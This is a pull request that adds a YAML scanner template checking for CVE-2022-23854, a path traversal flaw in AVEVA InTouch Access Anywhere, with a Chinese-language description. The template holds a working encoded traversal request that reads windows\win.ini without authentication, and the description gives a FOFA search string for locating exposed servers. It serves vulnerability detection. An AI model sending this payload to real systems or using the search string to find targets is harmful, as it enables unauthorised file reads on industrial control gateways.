### PR TITLE
Create poc-yaml-cve-2022-23854

### DIFF
--- a/pocs/poc-yaml-cve-2022-23854
+++ b/pocs/poc-yaml-cve-2022-23854
@@ -1,0 +1,18 @@
+name: poc-yaml-CVE-2022-23854
+manual: true
+transport: http
+rules:
+    r1:
+        request:
+            cache: true
+            method: GET
+            path: /AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini
+        expression: 
+            response.status == 200 &&response.body.bcontains(b"fonts")
+expression: r1()
+# 信息部分  
+detail:
+    author: wsw1055
+    link: https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/AVEVA%20InTouch%E5%AE%89%E5%85%A8%E7%BD%91%E5%85%B3%20AccessAnywhere%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2022-23854.md
+    described:
+        - AVEVA InTouch Access Anywhere Secure Gateway 2020 R2及以前的版本存在路径遍历漏洞，未授权的攻击者可利用该漏洞获取服务器敏感信息。


### PR DESCRIPTION
本 poc 是检测什么漏洞的
这个poc用来检测CVE-2022-23854(AVEVA InTouch Access Anywhere 路径遍历漏洞)

测试环境
fofa: body="InTouch Access Anywhere"

备注
AVEVA InTouch Access Anywhere Secure Gateway 2020 R2及以前的版本
![image](https://user-images.githubusercontent.com/63052830/197487204-af63558a-9acb-4333-a3f0-03c5ed79af34.png)
![image](https://user-images.githubusercontent.com/63052830/197487229-d5796414-de61-4daf-a442-c42519630740.png)
